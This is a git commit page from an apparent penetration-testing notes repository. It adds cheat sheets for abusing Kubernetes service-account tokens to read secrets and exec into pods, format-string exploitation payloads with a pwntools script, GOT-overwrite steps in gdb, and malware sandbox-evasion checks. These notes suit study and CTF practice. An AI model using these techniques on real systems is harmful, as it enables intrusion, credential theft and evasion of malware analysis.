whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

binary stuff

This commit is contained in:
Stefan Friese 2022-05-10 00:08:57 +02:00
parent d984780d59
commit e7dae2fa77
4 changed files with 136 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

13
enumeration/docs/kubectl.md
View File

@ -1,7 +1,8 @@
# Kubectl # Kubectl
* Get pods, `-A` for all namespaces
```sh ```sh
kubectl get pods kubectl get pods -A
``` ```
* Check mounted secret * Check mounted secret
```sh ```sh
@ -16,6 +17,7 @@ kubectl get jobs
* Intel about a secret, and output * Intel about a secret, and output
```sh ```sh
kubectl describe secrets <secret> kubectl describe secrets <secret>
kubectl get secret <secret> -o json
kubectl describe secrets <secret> -o 'json' kubectl describe secrets <secret> -o 'json'
``` ```
## Abuse Token ## Abuse Token
@ -33,5 +35,14 @@ kubectl exec -it <pod name> --token=$TOKEN -- /bin/sh
* If there is no internet connection add `imagePullPolicy: IfNotPresent` to the YAML file * If there is no internet connection add `imagePullPolicy: IfNotPresent` to the YAML file
```sh ```sh
kubectl apply -f pod.yml --token=$TOKEN kubectl apply -f pod.yml --token=$TOKEN
```
* Start Pod
```sh
kubectl exec -it everything-allowed-exec-pod --token=$TOKEN -- /bin/bash kubectl exec -it everything-allowed-exec-pod --token=$TOKEN -- /bin/bash
``` ```
## Start Pods
```sh
kubectl exec -it <podname> -n <namespace> -- /bin/bash
```

50
exploit/binaries/format_string/format_string.md
View File

@ -1,6 +1,7 @@
# Format String # Format String
* Read and write values from stack * Read and write values from stack
* [axcheron's writeup](https://axcheron.github.io/exploit-101-format-strings/)
## Read ## Read
@ -8,11 +9,21 @@
```sh ```sh
%x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x
``` ```
* Do long long hex reading from stack
```sh
%llx
```
* Select values as string, e.g. the second value * Select values as string, e.g. the second value
```sh ```sh
%2$s %2$s
``` ```
* Another way of reading is via `%p` * Another way of reading is via `%p`
* Read pointer on stack at offset 42
```sh
%42$p
```
* [ir0stone's pwn-notes](https://github.com/ir0nstone/pwn-notes/blob/master/types/stack/format-string.md) contains some useful pwntool scripts like this one * [ir0stone's pwn-notes](https://github.com/ir0nstone/pwn-notes/blob/master/types/stack/format-string.md) contains some useful pwntool scripts like this one
```python ```python
@ -27,3 +38,42 @@ payload += p32(0x8048000)
p.sendline(payload) p.sendline(payload)
log.info(p.clean()) log.info(p.clean())
``` ```
## Offset
* Read at offset as pointer value at the 42th argument on the stack
```sh
%42$s
```
* If the pointer at the offset references a string you can dereference by
```sh
%42$s
```
## Length of output
* Padding of the first argument on stack to the given length
```sh
%31337x
```
## Parameters
|Parameters |Type |Passed as
|-----------------|-------------------------------------------|-----------|
%d decimal (int) value
%u unsigned decimal (unsigned int) value
%x hexadecimal (unsigned int) value
%p hexadecimal (unsigned int), nice layout value
%s string ((const) (unsigned) char*) reference
%n write the number of bytes ypu put in, (*int) reference
## Tips and Tricks
* Overwrite GOT when there is no FullRELRO, when it is not read only
* Find the input argument on the stack. Write `AAAA` and look out where it is placed on the stack
```sh
AAAA%6$p
```

32
exploit/binaries/plt_got.md Normal file
View File

@ -0,0 +1,32 @@
# Procedure Lookup Table, Global Offset Table
* Both are part of dynamic binaries
* PLT resolves called function address of shared object
* A function call inside the binary, to a function inside a shared object is done via PLT
* __PLT__ contains dynamic address, references GOT
* __GOT__ contains the absolute address of the called functions. Dynamic linker updates the GOT
* __Lazy Linking__ is the process of loading the called SO function after they are called for the first time
## pwn
* Overwrite the GOT address of a called functions, which then will be returned instead
* Check the disassembly of the binary for SO function call
```sh
x/s <functionaddress>
x/3i <functionaddress>
```
* This is the PLT address
* Check the GOT address of the PLT. There should be `PTR` via `jmp` to the GOT address of the function
* Rewrite this address with for example `system`. Take a look where it is placed
```sh
p system
```
* Set the address of the `jmp` to GOT to `system` address
```sh
set *<foundGOTjmpAddress>=<foundSystemAddress>
```
* Fill the buffer with the argument to `system`

42
misc/sandbox_evasion.md Normal file
View File

@ -0,0 +1,42 @@
# Sandbox Evasion
* Evade the usual checks that will be run on you malware
## Sleeping
* [checkpoint](https://evasions.checkpoint.com/techniques/timing.html)
* [joesecurity](https://www.joesecurity.org/blog/660946897093663167)
## Geolocation
* Check the IP of the machine
* Check the block of the ISP via
```sh
https://rdap.arin.net/registry/ip/<IPBlock>
```
## System Info
* Check system info like
```sh
hostname
user
serial number
software versions
hardware specs
product keys
```
## Network Info
* Check all available network info like
```sh
interfaces
traffic
groups
domain admins
enterprise admins
dns
```